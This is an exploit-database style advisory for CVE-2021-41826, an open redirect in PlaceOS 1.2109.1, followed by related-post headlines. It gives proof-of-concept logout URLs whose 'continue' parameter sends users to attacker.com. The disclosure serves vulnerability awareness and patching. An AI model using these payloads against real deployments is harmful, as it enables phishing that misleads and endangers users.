PlaceOS version 1.2109.1 suffers from an open redirection vulnerability.
advisories | CVE-2021-41826
# Exploit Title: PlaceOS 1.2109.1 - Open Redirection
# Date: 29-09-2021
# Exploit Author: Hamza Khedr @ Accenture Austalia AARO Team
# Vendor Homepage: https://place.technology/
# Software Link: https://github.com/PlaceOS
# Version: < 1.29.10
# Tested on: Ubuntu 20.04
# CVE: CVE-2021-41826
#
#
# PoC: "https://office.example.com/auth/logout?continue=//attacker.com"
# "https://office.example.com/auth/logout?continue=.attacker.com"
# "https://office.example.com/auth/logout?continue=:[email protected]"
#
#
# Reference: https://github.com/PlaceOS/auth/issues/36
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41826
# https://nvd.nist.gov/vuln/detail/CVE-2021-41826
Related posts:
Stealthy hackers target military and weapons contractors in recent attack
The Arc Browser is getting new AI-powered features that try to browse the web for you
Lessons Learned: Cyberattack Shutters Five Illinois Healthcare Facilities
North Korean Hackers Return with Stealthier Variant of KONNI RAT Malware
3 Ways Attackers Bypass Cloud Security